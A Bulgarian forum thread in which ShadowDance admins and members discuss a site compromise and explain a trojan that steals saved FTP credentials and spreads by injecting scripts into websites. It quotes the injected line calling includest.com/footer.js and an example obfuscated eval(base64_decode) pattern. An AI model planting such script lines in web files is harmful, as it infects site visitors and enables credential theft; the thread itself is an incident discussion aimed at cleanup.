ShadowDance

Имаше проблем във форума. Оправен е. Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас

Майтапът е, че не мога да намеря информация точно за такъв trojan, който да добавя на края на файловете <script src="http://includest.com/footer.js"></script> (НЕ кликайте на това, ако се показва като връзка; не е забавно ). Виждал съм много подобни троянски коне, които по този начин прескачат от компютър към всички уебсайтове, до които собственикът на компютъра е имал достъп, оттам на компютрите на доста от посетителите и т.н.... но точно пък с includest.com не бях виждал.

Roamer wrote:Имаше проблем във форума. Оправен е. Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас

Майтапът е, че не мога да намеря информация точно за такъв trojan, който да добавя на края на файловете <script src="http://includest.com/footer.js"></script> (НЕ кликайте на това, ако се показва като връзка; не е забавно ). Виждал съм много подобни троянски коне, които по този начин прескачат от компютър към всички уебсайтове, до които собственикът на компютъра е имал достъп, оттам на компютрите на доста от посетителите и т.н.... но точно пък с includest.com не бях виждал.

Я обясни какъв точно е бил проблема?

Ха, казах ти, Даниеле :Р

Хммм
дава някакви неща в redone tag gz. кой го е пипал правил и защо

Преди около година се появи нов клас троянски коне, които работят по следния начин:

1. В HTML, JS, PHP и т.н. файлове на някой уебсайт се появява още един ред, който понякога (като в този случай) е просто "<script src="http://blaaaa/something.js"></script>", а друг път е същото, ама силно obfuscate-нато - eval(base64_decode("GBFDJXDFHFGHDHFFHGBHDFH")) или нещо такова.

2. Браузърът на жертвата поглежда някой от променените HTML, JS, PHP и т.н. файлове, изпълнява този ред и тегли въпросния something.js.

3. Този something.js използва проблем в сигурността на браузъра, за да "пробие" до ниво достъп до локални файлове и да инсталира троянския кон върху компютъра на жертвата

4. Троянският кон периодично претърсва компютъра за инсталирани неща като CuteFTP, FileZilla, WinSCP и други такива FTP/SFTP клиенти и събира запазените usernames и пароли, като ги предава на някакъв централен сървър.

5. В един момент - понякога седмици или дори месеци след оригиналното заразяване - централният сървър казва на всичките си войничета "айде, ето ви тук username и парола за ей-тоя сървър, действайте!" - и една орда zombie minions от цял свят започват да се закачат за сървъра, теглят де що има HTML, PHP, JS и т.н. файлове - *и добавят <script src="..."> накрая!*

6. В следващия момент някой невинен клиент поглежда сайта, браузърът му вижда <script src="...">... и цикълът започва отново

Ъ... Ами аз на мойта FileZilla като имам 5-6 запазени юзърнейми и пароли?! Ко се прай в такива случаи?

Ако имаш подозрения, че през компютъра ти е минал такъв trojan, ЗАДЪЛЖИТЕЛНО сменяш ВСИЧКИ запазени пароли. Няма друг начин. Повярвай ми, борил съм се с такива trojans няколко пъти миналата година в Space.BG и в CNsys (и от клиенти, и от колеги, и изобщо)... няма друг начин.

OK! Веднага!

Не "веднага", а след като си проверила за вируси и си сигурна, че няма. Защото ако троянецът е активен, като си смениш паролите, той ще прехване и новите.

Съвсем вярно е всичко това (и го срещнах в няколко случая миналата година), но сега въпросът е как се изкоренява троянецът, едва ли можеш да изтриеш всички .js файлове от компа?

също така ми е интересно къде има инфо за цялото това, т.е. интересно ми е как точно джаваскрипт файлът успява да се изпълни и да рови из локалните данни на фтп сървърите.


edit: ааа моя грешка, всъщност троянецът вероятно си е някакво dll/so? имам подозрението, че антивирусните едва ли ще го хванат....

Напоследък антивирусните хващат главно и основно кракове за игри, и всяка различно вади авирата не ми е пискала за нищичко от месеци реално.

Всъщност е имало случаи антивирусни програми да хващат такива жувотни. Затова се чудя защо не мога да намеря информация конкретно за този (имам само URL-то, което той добавя в script, само по него търся), че да ви кажа по-конкретно точно кой е и с какво се чисти.

Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас

Това значи, че потенциалната опасност от троянския кон/вирус е за хората от екипа на Shadowdance. За другите потребители има ли опасност? Въпросът ми е мега тъп предполагам, но хич ме няма с материята.

Хм. Истината е, че докато писах това, бях все още под впечатление от бързането да го оправя и бях съсредоточен върху причината и само част от резултатите (това, че форумът на практика не работеше твърде добре ).

Да - всички, които са отваряли главната (или която и да е) страница на форума вчера, докато той не позволяваше login и още няколко неща не работеха, са потенциално засегнати от проблема. Ако браузърът ви е заредил footer.js, както пишеше в HTML-ите, може и да сте заразени. За съжаление все още не знам точно с какво